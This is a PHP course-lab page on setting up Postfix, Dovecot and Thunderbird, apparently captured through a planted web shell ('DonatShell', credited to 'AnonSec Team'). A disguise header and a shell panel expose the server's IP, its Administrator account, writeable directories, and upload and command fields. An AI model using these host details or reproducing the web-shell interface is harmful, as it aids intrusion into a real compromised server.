GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/MichaelMalz/CST2608/_Archive/Labs/Lab07/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/MichaelMalz/CST2608/_Archive/Labs/Lab07//Lab07.phpinc
<?
// JimMartinson/CST2608/Labs/Lab07/index.php

include('Course/courseInfo.phpinc');
include('../../classInfo.phpinc');

$assignmentTitle = "Email Server";
$evaluationNumber = twoDigit($assignmentNumber);
$evaluationType = "Lab";
$evaluationTitle = $assignmentTitle;
if (strlen($assignmentNumber) == 1) { $assignmentName = $assignmentType."0".$assignmentNumber; $evaluationName = $evaluationType."0".$assignmentNumber; } else { 
$assignmentName = $assignmentType.$assignmentNumber; $evaluationName = $evaluationType.$assignmentNumber; }
if ($evaluationTitle != '') $evaluationTitle = ' - '.$evaluationTitle;

$title = $assignmentType." ".$assignmentNumber.": ".$assignmentTitle;
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
$smallTitle = true;
$js='openCenteredWindow';
include('common/pageHeader.phpinc');
include('JimMartinson/CST2608/Labs/StudentServerNameNAT.phpinc');
$sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title.' - '.username($userId);
$servername = strtolower(str_replace(array("-"," "),"",userLastname($userId)));
$spaces = 12 - strlen($servername);
$username = strtolower(str_replace(array("-"," "),"",$_SESSION['userFirstName']));
if ( $spaces > 0 ) { $spaces = str_repeat(" ",$spaces); } else { $spaces = " "; }
include('common/sectionHeader.phpinc');
?>
<fieldset><legend>Description</legend>
.
</fieldset>

<p>
<fieldset><legend>Lab Instruction</legend>
<ol start="1">
  <li>Install Postfix Mail Transfer Agent (MTA).
  	<ol type="a">
			<li>Install Postfix as per Chapter 15.1 <i>Email Services</i> in the <a href="/JimMartinson/CST2608/dn/Ubuntu/Ubuntu12.04_ServerGuide.pdf">Ubuntu 12.04 Server Guide</a>.</li>
			<li>Configure Postfix to utilize the ~/Maildir directory for mail.</li>
			<li>You can test your installation by searching for "Telnet SMTP example" and following the example or watch the WebEx.</li>
    </ol> 
  </li>
  <li>Install Dovecot Mail Delivery Agent (MDA).
  	<ol type="a">
			<li>Install Dovecot Server as per Chapter 15.3 <i>Email Services</i> in the <a href="/JimMartinson/CST2608/dn/Ubuntu/Ubuntu12.04_ServerGuide.pdf">Ubuntu 12.04 Server Guide</a>.</li>
			<li>Configure Dovecot to utilize the ~/Maildir directory for mail.</li>
    </ol> 
  </li>
  <li>Test your installation using Thunderbird.
  	<ol type="a">
			<li>Install Thunderbird.</li>
			<li>Configure Thunderbird to get mail from your server.</li>
			<li>Sent an email to your <b><?=$username?></b> user using Webin (the <b>Webin/Servers/Postfix Mail Server/User Mailboxes/<?=$username?>/Compose</b> page). Use a subject and message text of "Test from Webin".</li>
			<li>Send an email to your <b><?=$username?></b> user using using Thunderbird. Use a subject and message text of "Test from Thunderbird".</li>
			<? $postfix = 'a'; ?>
			<li>Display the Thunderbird Server Settings dialog.
				<br>Take a screenshot and save it as <b style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?><?=$postfix?>-<?=$userFullName?>.png</b>.
				<br><div id="show<?=$evaluationNumber?><?=$postfix?>" class="inline">(<a href="#" onClick="divHide('show<?=$evaluationNumber?><?=$postfix?>'); divShow('<?=$evaluationNumber?><?=$postfix?>'); return false;">Show example</a>)</div>
				<div id="<?=$evaluationNumber?><?=$postfix?>" class="hidden">(<a href="#" onClick="divHide('<?=$evaluationNumber?><?=$postfix?>'); divShowInline('show<?=$evaluationNumber?><?=$postfix?>'); return false;">Hide example</a>)<br><img src="images/CST2608-Lab<?=$evaluationNumber?><?=$postfix?>-JimMartinson.png" title="Example screenshot"></div>
			</li>
			<? $postfix = 'b'; ?>
			<li>Display the Thunderbird SMTP Server settings dialog.
				<br>Take a screenshot and save it as <b style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?><?=$postfix?>-<?=$userFullName?>.png</b>.
				<br><div id="show<?=$evaluationNumber?><?=$postfix?>" class="inline">(<a href="#" onClick="divHide('show<?=$evaluationNumber?><?=$postfix?>'); divShow('<?=$evaluationNumber?><?=$postfix?>'); return false;">Show example</a>)</div>
				<div id="<?=$evaluationNumber?><?=$postfix?>" class="hidden">(<a href="#" onClick="divHide('<?=$evaluationNumber?><?=$postfix?>'); divShowInline('show<?=$evaluationNumber?><?=$postfix?>'); return false;">Hide example</a>)<br><img src="images/CST2608-Lab<?=$evaluationNumber?><?=$postfix?>-JimMartinson.png" title="Example screenshot"></div>
			</li>
			<? $postfix = 'c'; ?>
			<li>Display your Thunderbird Inbox showing your two email messages.
				<br>Take a screenshot and save it as <b style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?><?=$postfix?>-<?=$userFullName?>.png</b>.
				<br><div id="show<?=$evaluationNumber?><?=$postfix?>" class="inline">(<a href="#" onClick="divHide('show<?=$evaluationNumber?><?=$postfix?>'); divShow('<?=$evaluationNumber?><?=$postfix?>'); return false;">Show example</a>)</div>
				<div id="<?=$evaluationNumber?><?=$postfix?>" class="hidden">(<a href="#" onClick="divHide('<?=$evaluationNumber?><?=$postfix?>'); divShowInline('show<?=$evaluationNumber?><?=$postfix?>'); return false;">Hide example</a>)<br><img src="images/CST2608-Lab<?=$evaluationNumber?><?=$postfix?>-JimMartinson.png" title="Example screenshot"></div>
			</li>
    </ol> 
  </li>
  <li>
    <a href="mailto:jim.martinson@ridgewater.edu?subject=<?=$courseNumber?> <?=$evaluationName?> Submission">Send an email</a> to jim.martinson@ridgewater.edu with a subject of <b style="white-space:nowrap"><?=$courseNumber?> <?=$evaluationName?> Submission</b> and attach the following files:
      <ol type="a">
      	<li><?=$courseNumber?>-<?=$evaluationName?>a-<?=$userFullName?>.png</li>
      	<li><?=$courseNumber?>-<?=$evaluationName?>b-<?=$userFullName?>.png</li>
      	<li><?=$courseNumber?>-<?=$evaluationName?>c-<?=$userFullName?>.png</li>
      	<li>/etc/postfix/main.conf</li>
      	<li>/etc/dovecot/dovecot.conf</li>
      </ol>
  </li>
</ol>
</fieldset>

<fieldset class="pio"><legend>Grading Criteria</legend>
Demonstrated assignment effectively: 10 points.
<br />
There are some things I expect. If they are incorrect you will lose the following:
<br />
Incorrect attachment file name: -1 pt.
<br />
Work submitted incorrectly: -1pt.
<br />
Incorrect subject in email: -1pt.
<br />
Second and subsequent submission of work for grading: -1pt.
<br />
Work submitted late: -1pt per week.
</fieldset>

<!--
<fieldset class="pio"><legend>Objectives</legend>
<ol class="obj pio" start="22">
	<li>Describe web hosting.</li>
	<li>Install and configure web hosting services such as Apache Web Server and PHP.</li>
	<li>Use web services.</li>
</ol>
</fieldset>
-->

<!--
<fieldset><legend>Notes</legend>
See <a href="Lab08/Notes">Notes</a>.<br>
Here is a <a href="Labs/<?=$evaluationName?>/<?=$evaluationName?>.zip"><?=$evaluationName?>.zip</a> file with examples of what must be turned in as well as pico and sudo scripts to help with the assignment.<br />
</fieldset>
-->

<?
include('../../ReferencesResources.phpinc');
include('common/sectionFooter.phpinc');
include('common/pageFooter.phpinc');



?>

Anon7 - 2022
AnonSec Team